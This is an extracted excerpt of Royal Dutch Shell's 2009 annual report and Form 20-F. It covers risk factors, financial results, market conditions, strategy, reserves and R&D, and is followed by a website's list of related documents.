products. If such risks materialise, they can result in injuries and disruption to business activities, which could have a material adverse effect on our operational performance and financial condition, as well as our reputation. Our investment in joint ventures and associated companies may reduce our degree of control as well as our ability to identify and manage risks. Many of our major projects and operations are conducted in joint ventures or associated companies. In certain cases, we may have less influence over and control of the behaviour, performance and cost of operations in which a Shell company holds an interest. Additionally, our partners or members of a joint venture or associated company (particularly local partners in developing countries) may not be able to meet their financial or other obligations to the projects, threatening the viability of a given project. Reliable information technology (IT) systems are a critical enabler of our operations. Organisational changes and process standardisation, which lead to more reliance on a decreasing number of global systems, outsourcing and relocation of information technology services as well as increased regulations increase the risk that our IT systems may fail to deliver products, services and solutions in a compliant, secure and efficient manner. Shell s future performance depends on successful development and deployment of new technologies. Technology and innovation are essential to Shell. If we do not develop the right technology, do not have access to it or do not deploy it effectively, it may affect the delivery of our strategy, our profitability and our financial condition. The general macroeconomic environment as well as financial and commodity market conditions influence Shell s operating results and financial condition as our business model involves trading, treasury, interest rate and foreign exchange risks. Shell companies are subject to differing economic and financial market conditions throughout the world. Political or economic instability affect such markets. For example, if the current worldwide economic downturndeepensorisprolonged,itcouldcontributetoinstabilityin financial markets. Shell uses debt instruments such as bonds and commercial paper to raise significant amounts of capital. Should our accesstodebtmarketsbecomemoredifficult,wemightnotbeableto maintain a level of liquidity required to fund the implementation of our strategy. Trading and treasury risks include among others exposure to movements in commodity prices, interest rates and foreign exchange rates, counterparty default and various operational risks (see also pages 81-82). As a global company doing business in over 90 countries, we are exposed to changes in currency values and exchange controls. While Shell does undertake some currency hedging, we do not do so for all of our activities. The resulting exposure could affect our earnings and cash flow (see Notes 4 and 23 to the Consolidated Financial Statements). Theestimationofreservesisaprocessthatinvolvessubjective judgements based on available information, so subsequent downward adjustments are possible. If actual production from such reserves is lower than current estimates indicate, our profitability and financial condition could be negatively impacted. The estimation of oil and gas reserves involves subjective judgements and determinations based on available geological, technical, contractual and economic information. The estimate may change because of new information from production or drilling activities or changes in economic factors. It may also alter because of acquisitions and disposals, new discoveries and extensions of existing fields and mines, as well as the application of improved recovery techniques. Published reserves estimates may also be subject to correction due to the application of published rules and guidance. Any downward adjustment would indicate lower future production volumes and may adversely affect our earnings as well as our financial condition. The Company s Articles of Association determine the jurisdiction for shareholder disputes. This might limit shareholder remedies. Our Articles of Association generally require that all disputes between our shareholders in such capacity and the Company or our subsidiaries (orourdirectorsorformerdirectors)orbetweenthecompanyandour
17 Shell Annual Report and Form 20-F Business Review fl Risk factors Directors or former Directors be exclusively resolved by arbitration in The Hague, the Netherlands under the Rules of Arbitration of the International Chamber of Commerce. Our Articles of Association also provide that if this provision is for any reason determined to be invalid or unenforceable, the dispute may only be brought in the courts of England and Wales. Accordingly, the ability of shareholders to obtain monetary or other relief, including in respect of securities law claims, may be determined in accordance with these provisions. Please see Corporate governance for further information. Violations of antitrust and competition law pose a financial risk for Shell and expose Shell or our employees to criminal sanctions. Antitrust and competition laws apply to Shell companies in the vast majority of countries in which we do business. Shell companies have been fined for violations of antitrust and competition law. These include a number of fines by the European Commission Directorate-General for Competition (DG COMP). Due to the DG COMP s fining guidelines, any future conviction of Shell companies for violation of European Union (EU) competition law could result in significantly enhanced fines. Violation of antitrust laws is a criminal offence in many countries, and individuals can be either imprisoned or fined. Furthermore, it is now common for persons or corporations allegedly injured by antitrust violations to sue for damages. An erosion of the business and operating environment in Nigeria could adversely impact our earnings and financial position. We face various risks in our Nigerian operations. These risks include security issues surrounding the safety of our people, host communities, and operations, our ability to enforce existing contractual rights, limited infrastructure and potential legislation that could increase our taxes. The Nigerian government is contemplating new legislation to govern the petroleum industry which, if passed into law, would likely have a significant influence on Shell s existing and future activities in that country and could adversely affect our financial returns from projects in that country. ShellhasinvestmentsinIranandSyria,countriesagainstwhich the US government imposed sanctions. We could be subject to sanctions or other penalties in connection with these activities. US laws and regulations identify certain countries, including Iran and Syria, as state sponsors of terrorism and currently impose economic sanctions against these countries. Certain activities and transactions in these countries are banned. Breaking these bans can trigger penalties including criminal and civil fines and imprisonment. For Iran, US law sets a limit of $20 million in any 12-month period on certain investments knowingly made in that country, prohibits the transfer of goods or services made with the knowledge that they will contribute materially to that country s weapons capabilities and authorises sanctions against any company violating these rules (including denial of financings by the US export/import bank, denial of certain export licences, denial of certain government contracts and limits of loans or credits from US financial institutions). However, compliance with this investment limit by European companies is prohibited by Council Regulation No. 2271/96 adopted by the Council of the EU, which means the statutes conflict with each other in some respects. While Shell did not exceed the limit on investments in Iran in 2009, we have exceeded it in the past and may exceed the US-imposed investment limitsiniraninthefuture.whileweseektocomplywithlegal requirements in our dealings in these countries, it is possible that Shell or persons employed by Shell could be found to be subject to sanctions or other penalties under this legislation in connection with their activities in these countries. Shell has substantial pension commitments, whose funding is subject to capital market risks. The risk regarding pensions is the ability to fund defined benefit plans to the extent that the pension assets fail to meet future liabilities. Liabilities associated with and cash funding of pensions can be significant and are dependent on various assumptions. Volatility in capital markets and the resulting consequences for investment performance as well as interest rates, may result in significant changes to the funding level of future liabilities. In case of a shortfall, Shell might be required to make substantial cash contributions, depending on the applicable regulations per country. For example, as a result of the funding shortfall experienced at the end of 2008, employer contributions to defined benefit pension funds in 2009 were $3.6 billion higher than in See Liquidity and capital resources for further discussion. Shell companies face the risk of litigation and disputes worldwide. From time to time cultural and political factors play a significant role in unprecedented and unanticipated judicial outcomes contrary to local and international law. In addition, certain governments, states and regulatory bodies have, in the opinion of Shell, exceeded their constitutional authority by attempting unilaterally to amend or cancel existing agreements or arrangements; by failing to honour existing contractual commitments; and by seeking to adjudicate disputes between private litigants. Adverse outcomes in these areas could have a material effect on our operations and financial condition. Shell is currently under investigation by the United States Securities and Exchange Commission and the United States Department of Justice for violations of the US Foreign Corrupt Practices Act..
18 16 Shell Annual Report and Form 20-F 2009 Business Review fl Summary of results and strategy SUMMARY OF RESULTS AND STRATEGY SEGMENT EARNINGS $MILLION Upstream 8,354 26,506 18,094 Downstream 3, ,445 Corporate 1,310 (69) 1,387 Income for the period 12,718 26,476 31,926 Earnings The most significant factors affecting year-to-year comparisons of earnings and cash flow generated by our operating activities are: changes in realised oil and gas prices; oil and gas production levels; and refining and marketing margins. During 2009, oil prices increased, but the average price was lower than in Gas prices and refining margins declined sharply, because of weaker demand and high industry inventory levels. Oil and gas production available for sale in 2009 was 3,142 thousand barrels of oil equivalent per day (boe/d), compared with 3,248 thousand boe/d in 2008 (including mined oil sands production of 78 thousand b/d). Earnings in 2009 were 52% lower than in 2008, when they were 17% lower than in The decrease reflected lower realised oil and gas prices and lower production in Upstream as well as lower margins and sales volumes in Downstream. These effects more than offset the positive effect on earnings of increasing oil prices on inventory. In 2009, Upstream earnings were $8,354 million, 68% lower than in 2008 and 54% lower than in Earnings in 2009 reflected the effect of significantly lower realised prices for both oil and gas in combination with lower production volumes. Moreover, the 2008 earnings included significant gains from the divestment of various assets. In 2008, earnings increased by 46% from 2007, mainly reflecting higher realised oil and gas prices, partly offset by lower production volumes. Downstream earnings in 2009 were $3,054 million, compared with $39 million in 2008 and $12,445 million in When earnings are adjusted for the impact of changing oil prices on inventory, then earnings in 2009 decreased significantly with respect to 2008 because lower demand drove down our realised refining margins and most of our realised marketing margins in The adjusted earnings also decreased between 2007 and 2008 because of lower margins on chemical products, lower refining margins in the USA and higher operating costs. Balance sheet and capital investment Shell s strategy to invest in the development of major growth projects, primarily in Upstream, explains the most significant changes to the balance sheet in Property, plant and equipment increased by $19.6 billion mainly as a result of capital investment of $31.7 billion, 17% lower than capital investment in The effect of capital investment on property, plant and equipment was partly offset by depreciation, depletion and amortisation of $14.5 billion in Of the 2009 capital investment, $24 billion related to Upstream projects that will primarily deliver organic growth over the long term. These projects include several multi-billion-dollar, integrated facilities that are expected to provide significant cash flows for the coming decades. In 2009, the total debt increased by $11.8 billion. Overall, total equity increased by $9.3 billion in 2009, to $138.1 billion. The gearing ratio was 15.5% at the end of 2009, compared with 5.9% at the end of The change reflects the increase of the total debt in combination with a decrease in the cash and cash equivalents position in Market overview The demand for oil and gas is strongly linked to the strength of the global economy. For that reason, projected economic growth is considered an indicator of the future demand for our products and services. Following the extreme contraction in the global economy in the fourth quarter of 2008 and first quarter of 2009 that was triggered by the severe financial crisis in the USA and Europe, world output accelerated over the remaining quarters of The recession ended in most major economies by the third quarter of the year. This turnaround was due in part to the extraordinary macroeconomic stimulus and financial sector supports implemented by governments and central banks to contain the crisis. In this context, the global economy contracted by (0.8%) in 2009, down from growth of 3.2% in 2008 and 5.1% in In 2010, global output growth is expected to recover, but the recovery is likely to be slow and uncertain given the depth of contraction in OIL AND NATURAL GAS PRICES Oil prices rose steadily through Brent crude oil started the year at $40 per barrel and in mid-november reached the $78 mark, which is approximately where it ended the year. On average, however, 2009 prices were considerably lower than they were in Brent crude oil averaged $61.55 per barrel in 2009, compared with $97.14 in 2008, and West Texas Intermediate averaged $61.75 per barrel in 2009, compared with $99.72 a year earlier. Natural gas prices also spanned a wide range in The Henry Hub prices trended downwards between January and September: from a monthly average high of $5.27 per million British thermal units (MMBtu) in January down to a monthly low of $2.88 in September, when inventories were hitting an all-time high and production had to be discouraged. From October until the end of 2009, however, Henry Hub gas prices reversed the trend with the onset of winter weather. Overall, the Henry Hub gas price averaged $3.90 per MMBtu in 2009 compared with $8.85 in In the UK, prices at the National Balancing Point averaged pence/therm in 2009 compared with pence/therm in Unlike crude oil pricing, which is global in nature, gas prices can vary significantly from region to region. Shell produces and sells natural gas in regions whose supply, demand and regulatory circumstances differ markedly from those of the US s Henry Hub or the UK s National Balancing Point. Natural gas prices in continental Europe and in the Asia-Pacific region are predominantly indexed to oil prices. In Europe, contractual time-lag effects resulted in a continued price decline throughoutthefirsthalfof2009,whiledemandwasatthesametime severely impacted by the recession. Oil-indexed prices started to recover in the fourth quarter, maintaining a very significant premium above the UK s National Balancing Point. OIL AND NATURAL GAS PRICES FOR INVESTMENT EVALUATION The range of possible future crude oil and natural gas prices used in project and portfolio evaluations within Shell are determined after assessment of short-, medium- and long-term price drivers under different sets of assumptions. Historical analysis, trends and statistical volatility are all part of this assessment, as are analyses of possible future economic conditions, geopolitics, OPEC actions, supply costs
19 Shell Annual Report and Form 20-F Business Review fl Summary of results and strategy and the balance of supply and demand. Sensitivity analyses are used to test the impact of low-price drivers, such as economic weakness, and high-price drivers, such as strong economic growth and low investment levels in new production. Short-term events, such as relatively warm winters or cool summers, weather-and (geo)political-related supply disruptions, contribute to price volatility. Shell expects oil prices to typically average $50 to $90 per barrel and screens new upstream opportunities inside this range. Shell uses a grid based on low, medium and high oil and gas prices to test the economic performance of long-term projects. As part of our normal business practice, the range of prices used for this purpose is always subject to review and change. REFINING AND PETROCHEMICAL MARKET TRENDS Refining margins were lacklustre in all key refining centres in Margins came under downward pressure with the reduced demand due to the global recession. On top of that, there was significant refinery overcapacity following the start-up of major refining facilities in Asia. Demand for petrochemicals recovered during the second half of 2009, as GDP growth resumed and restocking took place. Global ethylene demand grew a little under 1% in 2009 after suffering a decline of over 3% in Industry refining margins in 2010 are likely to remain fundamentally weak because of the expected ongoing global excess product inventory, particularly for middle distillates. Strategy and outlook STRATEGY Our strategy seeks to reinforce our position as a leader in the oil and gas industry in order to provide a competitive shareholder return while helping to meet global energy demand in a responsible way. Intense competition will remain for access to resources by our Upstream businesses and new markets by our Downstream businesses. We believe our technology, project-delivery capability and operational excellence will remain key differentiators for our businesses. In Upstream, we focus on exploration for new oil and gas reserves and developing major projects where our technology and know-how adds value to the resource holders. In our Downstream businesses, our emphasis remains on sustained cash generation from our existing assets and selective investments in growth markets. We will continue to focus on capital and cost discipline. We expect around 80% of our capital investment in 2010 to be in our Upstream projects. In Downstream, we aim to maintain relatively steady capital employed. Meeting oil and gas production. Our commitment to technology and innovation continues to be at the core of our strategy. As energy projects become more complex and more technically demanding, we believe our technical expertise will be a deciding factor in the growth of our businesses. Our key strengths include the development and application of technology, the financial and project-management skills that allow us to deliver large oil and gas projects, and the management of integrated value chains. We leverage our diverse and global business portfolio and customer-focused businesses built around the strength of the Shell brand. OUTLOOK We have defined three distinct layers for Shell s strategy development: near-term performance focus, medium-term growth delivery and maturing next generation project options. Performance focus In the near-term, we will emphasise performance focus. We will work on continuous improvements in operating performance, with an emphasis on health, safety and environment, asset performance and operating costs, including plans for $1 billion of cost savings in There will be asset sales of up to $3 billion per year as Shell exits from non-core positions across the company. We have new initiatives that are expected to improve on Shell s industry-leading Downstream, focusing on the most profitable positions and growth potential. Shell has plans to exit from 15% of its world-wide refining capacity and from selected retail and other marketing positions, and is taking steps to improve the quality of its chemicals assets. We plan net capital investment of some $29 billion in 2010 (net capital investment represents capital investment, less divestment proceeds). Thisamountrelateslargelytoinvestmentsinprojectswherethefinal investment decision has already been taken or is expected to be taken in This excludes any impact of the indicative offer to acquire Arrow Energy Limited. Growth delivery Organic capital investment is expected to be $25 to $30 billion per year for 2011 to 2014, as Shell invests for long-term growth. Annual spending will be driven by the timing of investment decisions and the near-term macro outlook. Cash flow from operations excluding working capital was $24 billion in Shell expects cash flow to grow by around 50% from 2009 to 2012 assuming a $60 oil price and a more normal environment for natural gas prices and downstream. In an $80 environment, 2012 cash flow should be at least 80% higher than 2009 levels. In Downstream, Shell is adding new chemicals capacity in Singapore and refining capacity in the USA, and making selective growth investment in marketing. Oilandgasproductionisexpectedtoaverage3.5millionboe/din 2012, compared to 3.1 million boe/d in 2009, an increase of 11%, and with confidence of further growth to Maturing next generation project options Shell has built up a substantial portfolio of options for the next wave of growth. This portfolio has been designed to capture price upside, and minimise Shell s exposure to industry challenges from cost inflation and political risk. Key elements of this opportunity set are in the Gulf of Mexico, USA and Canada tight gas, and Australia LNG. These are the projects that have the potential to underpin production growth to the end of the decade. Shell is working to mature these projects, with an emphasis on financial returns. Reserves and production Shell added 4,417 million boe of proved oil and gas reserves before production, of which 3,632 million boe comes from Shell subsidiaries
20 18 Shell Annual Report and Form 20-F 2009 Business Review fl Summary of results and strategy and 785 million boe is associated with the Shell share of equityaccounted investments. Included in the 4,417 million boe is 1,630 million boe of synthetic crude oil reserves. Last year, we had reported 997 million boe of proven minable oil sands reserves as of December 31, As a result of the SEC rule changes these proven minable. In 2009, total oil and gas production available for sale was 1,147 million boe. An additional 40 million boe was produced and consumed in operations. Production available for sale from subsidiaries was 828 million boe with an additional 35 million boe consumed in operations. The Shell share of the production available for sale of equity-accounted investments was 319 million boe with an additional 5 million boe consumed in operations. that stands most to profit from what they deliver. In doing so, we also established useful links between our Upstream and Downstream technologies. The new R&D organisation also enables us to introduce further simplification and standardisation in the way we manage the development of technology. Our R&D programme for 2010 will remain on the same general course as that for But it will benefit from the clearer lines of sight now established between a technology s creation and its ultimate deployment in the field. Key accounting estimates and judgements Please refer to Note 3 to the Consolidated Financial Statements for a discussion of key accounting estimates and judgements. Legal proceedings Please refer to Note 28 to the Consolidated Financial Statements for a discussion of legal proceedings. Audit fees Please refer to Note 29 to the Consolidated Financial Statements for a discussion of auditors fees and services. Accordingly, after taking into account total production we had a net increase of 3,230 million boe in proved oil and gas reserves of which 2,769 million boe is from subsidiaries and 461 million boe is associated with the Shell share of equity-accounted investments. Details of Shell subsidiaries and the Shell share of equity-accounted investments estimated net proved reserves are summarised in the table on page 29 and are set out under the heading Supplementary information Oil and gas on pages Research and development In 2009, our research and development (R&D) expenses were $1,125 million, compared with $1,230 million in 2008 and $1,167 million in Our R&D programme adapts and applies technologies that reduce the energy requirements, environmental impacts and running costs of our current operations. It also develops technologies that help us capitalise on business-growth opportunities, both in Upstream and in Downstream. And it can create entirely new technologies, such as those needed for alternative fuels or carbon capture and sequestration, which may become part of the world s energy system in the longer term. The technologies we created, developed and applied in our businesses during 2009 certainly spanned that wide range of purpose. For example, our current operations were made more efficient by the many Smart Field implementations that optimised production from oil and gas fields and by the catalysts we manufactured for the nearly completed Pearl GTL plant. New exploration prospects were identified in the Middle East and Africa with novel seismic survey technologies. And new markets were opened by our high-mileage FuelSave gasoline formulation, which was launched in various countries. Unprecedented technological achievements were also in the works in 2009, so that we can build a floating LNG plant for the offshore Prelude and Concerto fields of Australia and realise a full-scale cellulose-to-ethanol plant for next-generation biofuels. With the Transition 2009 reorganisation, we sharpened the accountability for delivery of all aspects of our R&D programme. We also linked the programme s projects more closely with the business
BUILDING AN ENERGY FUTURE ANNUAL REPORT. Royal Dutch Shell plc Annual Report and
BUILDING AN ENERGY FUTURE ANNUAL REPORT Royal Dutch Shell plc Annual Report and Form 20-F for the year ended December 31, 2012 Our businesses BUILDING AN ENERGY FUTURE Global energy demand is rising and
REMUNERATION 2015 REMUNERATION OUTCOME. ROYAL DUTCH SHELL April, 2016
REMUNERATION 2015 REMUNERATION OUTCOME ROYAL DUTCH SHELL April, 2016 1 CAUTIONARY NOTE The companies in which Royal Dutch Shell plc directly and indirectly owns investments are separate entities. In this
a b c d E F G H I J K l m n o p
a b c d E F G H I J K l m n o p I a b c d M M F H J E K l N p p 0 O p G UNITED STATES SECURITIES AND EXCHANGE COMMISSION Washington, D.C. 20549 Form 20-F ANNUAL REPORT PURSUANT TO SECTION 13 OR 15(d) OF
COMPANY UPDATE FIRST QUARTER 2016 RESULTS
COMPANY UPDATE FIRST QUARTER 2016 RESULTS ROYAL DUTCH SHELL 4 MAY 2016 Copyright of Royal Dutch Shell plc May 4, 2016 1 SIMON HENRY CHIEF FINANCIAL OFFICER ROYAL DUTCH SHELL PLC 2 DEFINITIONS & CAUTIONARY
Third LAC Tax Policy Forum
Third LAC Tax Policy Forum Cooperative Compliance - a business perspective Wilbert Huijbens; Tax Manager; Shell International BV Montevideo, Uruguay; DEFINITIONS AND CAUTIONARY NOTE Resources: Our use
BUILDING AN ENERGY FUTURE
BUILDING AN ENERGY FUTURE ANNUAL REPORT ROYAL DUTCH SHELL PLC ANNUAL REPORT AND FORM 20-F FOR THE YEAR ENDED DECEMBER 31, 2011 OUR BUSINESSES BUILDING AN ENERGY FUTURE GLOBAL ENERGY DEMAND IS RISING AND
Road Safety ROAD SAFETY
Road Safety 1 ROAD SAFETY Our staff and contractors drive around 1.1 billion kilometres each year: to deliver products to our customers or keep our operations running. That s equivalent to driving about
Process safety in Shell
Process safety in Shell 1 Process safety in Shell Our assets are safe and we know it Given the nature of the risks involved, ensuring the safety and integrity of our assets is paramount to Shell. For us,
Oil Spill Emergency Response. Oil Spill Emergency
Oil Spill Emergency Response 1 Oil Spill Emergency Response We work to prevent incidents that may result in spills of hazardous substances. This means making sure our facilities are well designed, safely
Shell Global Helpline - Telephone Numbers
Shell Global Helpline - Telephone Numbers The Shell Global Helpline allows reports to be submitted by either a web-based form at or by utilising one of a number of telephone
Six Months Ended June 30 Millions of dollars
Chevron Reports Second Quarter Loss of $1.5 Billion Impairments and lower crude oil prices reduce earnings Continued progress on spend reduction and major growth projects San Ramon, Calif., July 29, 2016
CONTRACT MANAGEMENT IN SHELL
CONTRACT MANAGEMENT IN SHELL NEVI Management Dag 14 Amersfoort Coen Wilms Group ing Discipline Manager DEFINITIONS AND CAUTIONARY NOTE The companies in which Royal Dutch Shell plc directly and indirectly
Appendix 1: Full Country Rankings
Appendix 1: Full Country Rankings Below please find the complete rankings of all 75 markets considered in the analysis. Rankings are broken into overall rankings and subsector rankings. Overall Renewable
U.S. Salary Increase Survey Highlights
Consulting Performance, Reward & Talent 2012 2013 U.S. Salary Increase Survey Highlights We ask each participating company to treat these survey findings with the greatest confidence. The findings are
Morningstar Document Research
Morningstar Document Research FORM20-F Royal Dutch Shell plc - N/A Filed: March 12, 2015 (period: December 31, 2014) Annual and transition report of foreign private issuers under sections 13 or 15(d) The
ANNUAL REPORT Royal Dutch Shell plc Annual Report and Form 20-F for the year ended December 31, 2014
ANNUAL REPORT Royal Dutch Shell plc Annual Report and Form 20-F for the year ended December 31, 2014 CONTENTS 01 INTRODUCTION 01 Form 20-F 02 Cross reference to Form 20-F 04 Terms and abbreviations 05
Emerging Markets Value Stock Fund
SUMMARY PROSPECTUS PRIJX March 1, 2016 T. Rowe Price Emerging Markets Value Stock Fund A fund seeking long-term growth of capital through investments in undervalued stocks of companies in emerging market
U.S. Trade Overview, 2013
U.S. Trade Overview, 213 Stephanie Han & Natalie Soroka Trade and Economic Analysis Industry and Analysis Department of Commerce International Trade Administration October 214 Trade: A Vital Part of)
Sulfuric Acid 2013 World Market Outlook and Forecast up to 2017
Brochure More information from Sulfuric Acid 2013 World Market Outlook and Forecast up to 2017 Description: Sulfuric Acid 2013 World Market Outlook
Royal Dutch Shell Our purpose
Delivery and growth Royal Dutch Shell plc Annual Report and Form 20-F for the year ended December 31, 2006 Royal Dutch Shell Our purpose The objectives of the Shell Group are to engage safely, responsibly,
List of tables. I. World Trade Developments
List of tables I. World Trade Developments 1. Overview Table I.1 Growth in the volume of world merchandise exports and production, 2010-2014 39 Table I.2 Growth in the volume of world merchandise
Waterpark Lines World Report
Brochure More information from Waterpark Lines World Report Description: This report provides Market Consumption/Products/Services for 100 countries by
Royal Dutch Shell plc
Royal Dutch Shell plc 4 TH QUARTER AND FULL YEAR 2011 UNAUDITED RESULTS Royal Dutch Shell s fourth quarter 2011 earnings, on a current cost of supplies (CCS) basis (see Note 1), were $6.5 billion compared
Corporate Banking. Understanding your Corporate Banking needs in Africa. Search
Corporate Banking Understanding your Corporate Banking needs in Africa Contents 3 Working alongside you to power your success 4 Bringing your business a dedicated relationship model 5 A range of services
ADVOC. the international network of independent law firms
ADVOC the international network of independent law firms About ADVOC ADVOC is an international network of independent law firms, sharing international expertise in jurisdictions across the globe Our
The World Market for Medical, Surgical, or Laboratory Sterilizers: A 2013 Global Trade Perspective
Brochure More information from The World Market for Medical, Surgical, or Laboratory Sterilizers: A 2013 Global Trade Perspective Description: This
International Financial Reporting Standards
International Financial Reporting Standards Of Growing Importance for U.S. Companies Assurance Services there is no longer a choice Three factors may influence your need to consider IFRS. First, many organizations
BlackBerry Reports 2015 Fiscal First Quarter GAAP Profitability
NEWS RELEASE FOR IMMEDIATE RELEASE June 19, BlackBerry Reports 2015 Fiscal First Quarter GAAP Profitability Waterloo, ON BlackBerry Limited (NASDAQ: BBRY; TSX: BB), a global leader in mobile communications,, Exchange Awards 2017
Including the All-New Corporate FX Awards In January 2017, Global Finance will publish its annual selections for the World s Best Foreign Exchange Providers. Global Finance will name the best foreign exchange
How Much Do U.S. Multinational Corporations Pay in Foreign Income Taxes?
FISCAL FACT May. 2014 No. 432 How Much Do U.S. Multinational Corporations Pay in Foreign Income Taxes? By Kyle Pomerleau Economist Key Findings The United States worldwide system of corporate taxation
Faster voice/data integration for global mergers and acquisitions
Global agility in technology solutions. sm Faster voice/data integration for global mergers and acquisitions >The InTech Group, Inc. Worldwide in-country technical resources for newly merged
MALTA TRADING COMPANIES IN MALTA
MALTA TRADING COMPANIES IN MALTA Trading companies in Malta 1. An effective jurisdiction for international trading operations 410.000 MALTA GMT +1 Located in the heart of the Mediterranean, Malta has always
The 2016 World Forecasts of Aluminum Doors, Windows, Door Thresholds, and Window Frames Export Supplies
Brochure More information from The 2016 World Forecasts of Aluminum Doors, Windows, Door Thresholds, and Window Frames Export Supplies Description: This
Management s Discussion and Analysis
Management s Discussion and Analysis of Financial Conditions and Results of Operations For the quarter and six months ended June 30, 2012 All figures in US dollars This Interim Management s
All our reports are available Download our apps at Check our latest news at STRATEGIC REPORT
STRATEGIC REPORT Royal Dutch plc Strategic Report for the year ended December 31, 2014 CONTENTS 02 STRATEGIC REPORT 02 Chairman s message 03 Chief Executive Officer s review 05 Business overview 07 Risk
ORMEN LANGE OG NYHAMNA Regionale, nasjonale og globale dimensjoner
ORMEN LANGE OG NYHAMNA Regionale, nasjonale og globale dimensjoner JazzGass 2013 Monika Hausenblas Vice President Norway, Shell Upstream International 1 CAUTIONARY NOTE The companies in which Royal Dutch
Facts about German foreign trade in 2012*
Facts about German foreign trade in 2012* Foreign trade figures in 2012 Exports Imports Net foreign demand Total Goods Services Total Goods Services Total memorandum items billion EUR In relation to EU
The big pay turnaround: Eurozone recovering, emerging markets falter in 2015
The big pay turnaround: Eurozone recovering, emerging markets falter in 2015 Global salary rises up compared to last year But workers in key emerging markets will experience real wage cuts Increase in
Culture in the Cockpit Collision or Cooperation?
Culture in the Cockpit Collision or Cooperation? Dr. Nicklas Dahlstrom Human Factors Manager Understanding Safety - The Changing Nature of Safety 1 Lives lost per year How safe is flying? 100 000 10 000
TRANSFERS FROM AN OVERSEAS PENSION SCHEME
PENSIONS PROFILE DECEMBER 2011 TRANSFERS FROM AN OVERSEAS PENSION SCHEME = Summary A simplified guide to the process: 1. Individual requests transfer from their overseas pension scheme to their UK registered
Building on Strengths EXCERPT FROM THE 2009 SUMMARY ANNUAL REPORT
Building on Strengths EXCERPT FROM THE 2009 SUMMARY ANNUAL REPORT Certain disclosures in this Summary Annual Report may be considered forward-looking statements. These are made pursuant to safe harbor
One billion digital TV households
One billion digital TV households About 455 million digital homes were added around the world between end-2010 and end-2014, according to a new report from Digital TV Research. This took the digital TV
2015 Country RepTrak The World s Most Reputable Countries
2015 Country RepTrak The World s Most Reputable Countries July 2015 The World s View on Countries: An Online Study of the Reputation of 55 Countries RepTrak is a registered trademark of Reputation Institute.
March 2015 MEGATRENDS IN THE OIL AND GAS INDUSTRY
March 2015 MEGATRENDS IN THE OIL AND GAS INDUSTRY Cautionary Statement The following presentation includes forward-looking statements. These statements relate to future events, such as anticipated revenues,
Big Gets Bigger, Smaller Gets Smaller
latest thinking Big Gets Bigger, Smaller Gets Smaller The data centre market is entering a period of unprecedented transition. With this shift comes a number of significant and perhaps surprising changes.
The face of consistent global performance
Building safety & security global simplified accounts The face of consistent global performance Delivering enterprise-wide safety and security solutions. With more than 500 offices worldwide Johnson Controls
Data Modeling & Bureau Scoring Experian for CreditChex
Data Modeling & Bureau Scoring Experian for CreditChex Karachi Nov. 29 th 2007 Experian Decision Analytics Credit Services Help clients with data and services to make business critical decisions in credit
LNG Balancing domestic and export needs
LNG Balancing domestic and export needs World Gas Conference Paris, France Maarten Wetselaar Executive Vice President, Shell Integrated Gas, Royal Dutch Shell plc June 3 2015 Appointed the Executive Vice
opinion piece Eight Simple Steps to Effective Software Asset Management
opinion piece Eight Simple Steps to Effective Software Asset Management Contents Step 1: Collate your licence agreements 01 Step 2: Determine your actual licence position 01 Step 3: Understand your existing | http://docplayer.net/1697306-Annual-report-royal-dutch-shell-plc-annual-report-and-form-20-f-for-the-year-ended-december-31-2009.html | CC-MAIN-2018-22 | en | refinedweb |
I couldn't find one central thread about this, so let's get everyone's opinion in one place!
Let's discuss what language is best for absolute beginners to learn. These beginner programmers will be learning the very basic aspects of software development; logic, debugging, problem solving, etc..
In the poll, I tried to group similar languages together. There is really no point having separate categories for C# and Java in this context. If there are any languages that do not fit in the poll, or if you cannot decide what category your language fits in, please post and hopefully I can have the poll amended.
I'll start with my opinion, which I have copied from a post I just made in one of these "* as a first language" topics:
c0mrade said:
C is a very simple language, and will let you learn the basic skills of a programmer, such as logic and debugging, without having to learn more than you need to.
For example, in Java, just to say hello world you need to create a class ("public class MyApp { ..."), add a method that is both "public" and "static", then write the call to print "hello world". The problem with this is that beginning programmers have no what a class is and why it is needed, and they have no idea why the method should be public and static. Plain old C has none of this overhead.
That said, I don't think it really matters that much. Starting out will be tough, but we all get through it one way or another. It's just about how easy those first steps will be. Also, I'm sure the best choice greatly varies from person to person.
This post has been edited by c0mrade: 25 April 2009 - 10:01 AM | http://www.dreamincode.net/forums/topic/101582-the-best-first-programming-language/ | CC-MAIN-2018-22 | en | refinedweb |
C++ has another datatype called class that is very similar to struct. A simple class definition looks like this:
class className { members };
The first line of the class definition is called the classHead. The features of a class include data members, member functions, and access specifiers. Member functions are used to manipulate or manage the data members.
After a class has been defined, the class name can be used as a type for variables, parameters, and returns from functions. Variables of a class type are called objects, or instances, of a class.
Member functions for class T specify the behavior of all objects of type T and have access to all members of the class. Non-member functions normally manipulate objects indirectly by calling member functions. The set of values of the data members of an object is called the state of the object.
To define a class (or any other type) we generally place the definition in a header file, preferably with the same name as the class and with the .h extension. Example 2.3 shows a class definition defined in a header file.
Example 2.3. src/classes/fraction.h
Header files are #included in other files by the preprocessor. To prevent a header file from accidentally being #included more than once in any compiled file, we wrap it with #ifndef-#define . . . #endif preprocessor macros (see Section C.1).
Generally, we place the definitions of member functions outside the class definition in a separate implementation file with the .cpp extension.
The definition of any class member outside the class definition requires a scope resolution operator of the form ClassName:: before its name. The scope resolution operator tells the compiler that the scope of the class extends beyond the class definition and includes the code between the :: and the closing brace of the function definition.
Example 2.4 is an implementation file that corresponds to Example 2.3.
Example 2.4. src/classes/fraction.cpp
Every identifier has a scope (see Section 20.2), a region of code where a name is "known" and accessible. Class member names have class scope. Class scope includes the entire class definition, regardless of where the identifier was declared, as well as inside each member function definition, starting at the :: and ending at the closing brace of the definition.
So, for example, the members, Fraction::m_Numerator and Fraction::m_Denominator are visible inside the definitions of Fraction::toString() and Fraction::toDouble() even though those function definitions are in a separate file. | https://flylib.com/books/en/2.385.1/class_definitions.html | CC-MAIN-2018-22 | en | refinedweb |
A convenient solution to get value from IDataReader field.
/// <summary> /// Gets the reader field value. /// </summary> /// <typeparam name="TField">The type of the field.</typeparam> /// <param name="reader">The reader.</param> /// <param name="fieldName">Name of the field.</param> /// <returns></returns> public static TField GetValue<TField>(this IDataReader reader, string fieldName) { //Guard if (string.IsNullOrEmpty(fieldName)) throw new ArgumentException("fieldName"); return (TField)reader.GetValue(reader.GetOrdinal(fieldName)); }
Usage:
IDataReader reeader = _database.ExecuteReader(command); if (reader.Read()) { int productId = reader.GetValue<int>("ProductId"); }
Thanks,
but what is the difference between this and the Typed Accessor Methods(GetString,GetInt32,GetDouble…)?
This is the methods used when you use reader.GetDouble(int i):
public override double GetDouble(int i)
{
